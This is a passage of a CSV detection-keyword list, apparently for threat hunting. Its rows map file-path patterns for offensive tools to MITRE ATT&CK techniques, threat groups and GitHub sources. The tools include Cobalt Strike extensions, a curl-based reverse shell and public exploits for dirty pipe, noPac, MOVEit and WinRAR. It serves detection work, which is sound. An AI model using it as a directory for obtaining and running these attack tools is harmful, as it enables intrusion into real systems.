T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*/csOnvps/*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*/cs-rdll-ipc-example/*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*/CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/cs-token-vault/*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*/cube0x0/noPac*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/cube0x0/noPac","1","1","N/A","N/A","10","1259","318","2021-12-16T09:50:15Z","2021-12-11T19:27:30Z" +"*/cuddlephish.git*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*/cuddlephish.html*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*/cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/curl.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curl.x64.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curl.x86.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*/curlshell.git*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*/custom_payload_generator/*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" +"*/customPayload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*-*_POC.py*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-*.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE*/chocobo_root*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/cve*/exploit.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/CVE-*_EXPLOIT_0DAY/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" +"*/CVE-*x64.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-*x86.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/CVE-2009-2698/katon.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/CVE-2022-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CVE-2022-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/CVE-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" +"*/CVE-2022-0847/write_anything.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/CVE-2022-0847-dirty-pipe-checker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" +"*/CVE-2022-0847-DirtyPipe-Exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","10","1057","223","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z" +"*/CVE-2022-0847-dirty-pipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","1","2","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z" +"*/CVE-2022-0847-Docker*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z" +"*/cve-2022-23131-exp/blob/main/zabbix.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" +"*/CVE-2022-26809-RCE*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" +"*/CVE-2023-*.git*","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CVE-2023-34362.git*","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" +"*/CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*/cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/CWoNaJLBo/VTNeWw11212/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/CWoNaJLBo/VTNeWw11213/*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 